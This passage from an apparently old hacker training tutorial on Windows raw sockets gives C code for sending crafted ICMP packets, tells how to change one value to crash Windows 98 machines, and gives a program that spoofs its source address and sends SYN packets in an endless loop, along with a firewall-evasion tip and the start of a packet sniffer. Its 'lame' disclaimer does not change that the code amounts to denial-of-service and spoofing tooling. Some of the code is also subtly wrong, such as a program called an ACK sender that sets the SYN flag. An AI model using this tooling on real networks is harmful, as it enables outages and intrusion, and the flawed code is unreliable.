windows internet programming part 3.html

黑客培训教程

    printf("Message Sent\n");

    // Close socket and WinSock
    closesocket(sock);
    WSACleanup();
    return 0;
}

/********************* icmp.c source file ************************/

Well start up your compiler and link to the Ws2_32.lib file then
add the icmp.c and icmp.h files to a new project. Compile and run
this program by typing icmp 127.0.0.1 at the command line. The
program takes the argument passed to it, 127.0.0.1 or any other
IP Address you want and sends an ICMP message with a type of 13 and
a code of 0, this setting is an ICMP echo request. Now remember
that whatever values you enter in the code for the ICMP headers
fields, that is the type of ICMP Message that is sent. For example,
if we were to change the type to 17 then we would be sending a ICMP
Netmask request, the target machine would then send back a Netmask
Reply which we could use to map a target network. Or say if we went
to www.tlsecurity.com and browsed for vulnerabilities and the words
ICMP and Win98 were to catch our eye, here we would find a
vulnerability for Windows 98 called p-smash. Now this advisory
tells us that if we sent an icmp message to a computer running
Windows 98 that had a Type of 9 and a code of 0 then the thing
halt and stop responding. Therefore all we have to do with the
above program is change:

#define ICMP_ECHOREQ		13

	to

#define ICMP_ECHOREQ		19

in the header file, then when we send this to a Windows 98 machine
the thing halts, an icmp DoS tool.

Lamer Alert: I was using the above as an example DoS tools are
indeed very lame!! and just shouldn't be used or designed, advisories
are of course a good thing, they prompt vendors to do something about
security vulnerabilities and promote security awareness, don't be
lame, don't use DoS tools, otherwise you'll give Steve Gibson more
stuff to prattle on about and ill have to bore ya to death with more
flaming of 'the prick' (yes by flaming of the prick i am refering to
Giving out about Gibson not medical conditions, I know what you were
thinking cyberwolf!).


6.2 TCP ACK PACKET
=======================================

/*********************** ip.h header file *************************/

#include <winsock2.h&gt
#include <windows.h&gt
#include <ws2tcpip.h&gt
#include <stdio.h&gt

struct tcpheader {
 unsigned short int th_sport;
 unsigned short int th_dport;
 unsigned int th_seq;
 unsigned int th_ack;
 unsigned char th_x2:4, th_off:4;
 unsigned char th_flags;
 unsigned short int th_win;
 unsigned short int th_sum;
 unsigned short int th_urp;
}; /* total tcp header length: 20 bytes (=160 bits) */

struct ipheader {
 unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */
 unsigned char ip_tos;
 unsigned short int ip_len;
 unsigned short int ip_id;
 unsigned short int ip_off;
 unsigned char ip_ttl;
 unsigned char ip_p;
 unsigned short int ip_sum;
 unsigned int ip_src;
 unsigned int ip_dst;
}; /* total ip header length: 20 bytes (=160 bits) */

// Psuedo Header

typedef struct ps_hdr
{
    unsigned int   source_address;   // Source Address		 =>	  4 Bytes
    unsigned int   dest_address;     // Destination Address	 =>	  4 Bytes
    unsigned char  placeholder;	     // Place Holder		 =>	  1 Bytes
    unsigned char  protocol;	     // Protocol		 =>	  1 Bytes
    unsigned short tcp_length;	     // TCP Length		 =>    +  2 Bytes
				     //				       = 12 Bytes
    struct tcpheader tcp;

}PS_HDR;

// IP/TCP/UDP Checksum Function

USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum=0;
    while (size > 1)
    {
        cksum += *buffer++;
        size  -= sizeof(USHORT);   
    }
    if (size)
    {
        cksum += *(UCHAR*)buffer;   
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16); 
    return (USHORT)(~cksum); 
}

/*********************** ip.h header file *************************/

Well that header file contained a few #define's, these dealt with
TCP's control bits like ack and sequence and so on to make things
more readable later. We then setup up the structures for the IP,
TCP and Psuedo Headers and the function to calculate the checksum.
Now lets put the header to use with the ack program, this program
will send a single ACK packet to whatever computer you specify.

/********************** main.c source file ************************/

#include "ip.h"

#define PORT 25

int main (void)
{

	WSADATA wsd;
	char datagram[4096];
	bool bOpt = 1;

    if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
    {
	   printf("WSAStartup() failed: %d\n", GetLastError());
	   return -1;
    }

// Create a raw socket

    SOCKET s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s == INVALID_SOCKET)
    {
       printf("WSASocket() failed: %d\n", WSAGetLastError());
       return -1;
    }

  struct ipheader *iph = (struct ipheader *) datagram;
  struct tcpheader *tcph = (struct tcpheader *) datagram + sizeof (struct ipheader);
  struct sockaddr_in sin;

  PS_HDR pseudo_header;

  sin.sin_family = AF_INET;
  sin.sin_port = htons (PORT);
  sin.sin_addr.s_addr = inet_addr ("127.0.0.1");

  memset (datagram, 0, 4096);	/* zero out the buffer */

  iph->ip_hl		 = 5;
  iph->ip_v			 = 4;
  iph->ip_tos		 = 0;
  iph->ip_len		 = sizeof (struct ipheader) + sizeof (struct tcpheader);
  iph->ip_id		 = 1;
  iph->ip_off		 = 0;
  iph->ip_ttl		 = 255;
  iph->ip_p			 = 6;
  iph->ip_sum		 = 0;
  iph->ip_src		 = inet_addr ("1.2.3.4");
  iph->ip_dst		 = sin.sin_addr.s_addr;

  tcph->th_sport	 = htons (1234);
  tcph->th_dport	 = htons (PORT);
  tcph->th_seq		 = rand();
  tcph->th_ack		 = 0;
  tcph->th_x2		 = 0;
  tcph->th_off		 = 0;
  tcph->th_flags	 = 2; // SYN
  tcph->th_win		 = htons(65535);
  tcph->th_sum		 = 0;
  tcph->th_urp		 = 0;

  // Build the Psuedo Header

  pseudo_header.source_address    = inet_addr ("1.2.3.4");
  pseudo_header.dest_address	  = sin.sin_addr.s_addr;
  pseudo_header.placeholder		  = 0;
  pseudo_header.protocol		  = IPPROTO_TCP;
  pseudo_header.tcp_length		  = htons(sizeof(tcpheader));

// Calculate Checksum

  tcph->th_sum = checksum((unsigned short *)&pseudo_header, sizeof(pseudo_header));
  iph->ip_sum  = checksum((unsigned short *)&iph, sizeof(ipheader));
// ENABLE IPHDRINCL 

    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)) == SOCKET_ERROR)
    {
	   printf("setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
	   return -1;
    }

  while (1)
    {
      // Send The Packet

    if (sendto(s, datagram, sizeof(datagram), 0, (SOCKADDR *)&sin, sizeof(sin)) == SOCKET_ERROR)
    {
       	   printf("sendto() failed: %d\n", WSAGetLastError());
	   return -1;
    }
    }

  return 0;
}

/********************** main.c source file ************************/

This program sends a tcp SYN packet to a target (you), it is a simple
program but a very powerful one. You can edit all of the header fields
enabling us to spoof our ip address amongst other things.

Notice that we can also set the port numbers, some firewalls will
let a packet with a port of 53 trough and not even log it, by knowing
security tid bits like this we can build better more sophisticated
programs.


7.0 RECIEVING RAW PACKETS
=======================================

Recieving Raw Packets was never dealt with in the Berkeley Raw Socket
specification, so far only linux 2.2.3 and up I believe ever dealt
with them, it is of course therefore surprising that Microsoft has
indeed supported a way to recieve raw packets with our programs! Yes
indeed I am starting to like the guy who came up with the idea of
supporting raw sockets in Windows more and more! But how do we do it?
Well what we do is this: sniff all incomming packets on our computer
and filter them for the packet we are looking for. This method can
be used for, obviously, creating a packet sniffer and also for a
firewall or some port redirection tool. Very good idea.

We do it by creating a new raw socket and binding it to the interface,
go into promiscuous mode and grab all the incomming packets.

As usual we would set up our socket with something like the following:

    SOCKET        sniffsock;
    SOCKADDR_IN   if0;


    sniffsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);


and then call bind() with this raw socket:


    bind(sniffsock, (SOCKADDR *)&if0, sizeof(if0));


we then go into Promiscuous mode and recieve all of the packets by
calling WSAIoctl() with SIO_RCVALL set:


   WSAIoctl(sniffsock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL,	NULL);


we can then use the WSARecv() function to grab the packets and feed
them into a buffer like so:


   recv(sniffsock, RecvBuf, sizeof(RecvBuf), 0);


We then use our own filterpacket() function to look for the particular
packet that we want.


So now for some example source code, this program will capture all packets
sent to your computer for as long as the program is running, to do this well
use a while loop to capture the packets then pass the packet to a function
called filterpacket() in order to get the information from the packets
headers. First create a new project and add a .cpp c++ source file.
Here comes the science bit.


/********************** recv.c source file ************************/

#include <winsock2.h&gt
#include <windows.h&gt
#include <ws2tcpip.h&gt
#include <stdio.h&gt

void outtie(char *p)
{
	FILE *fp = fopen("Sniffer1.txt","a+");
	fprintf(fp,"%s\n",p);
	fclose(fp);
}

#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
#define MAX_ADDR_LEN 16
#define MAX_HOSTNAME_LAN 255

typedef struct _iphdr
{
unsigned char	h_lenver;
unsigned char	tos;
unsigned short	total_len;
unsigned short	ident;
unsigned short	frag_and_flags;
unsigned char	ttl;
unsigned char	proto;
unsigned short	checksum;
unsigned int	sourceIP;
unsigned int	destIP;
}IP_HDR;

void RecvPacket();
int filterpacket(char *buf);

char     output[500];

void main()
{
RecvPacket();
}

void RecvPacket()
{
    SOCKET        sock;
    WSADATA       wsd;
    char RecvBuf[65535] = {0};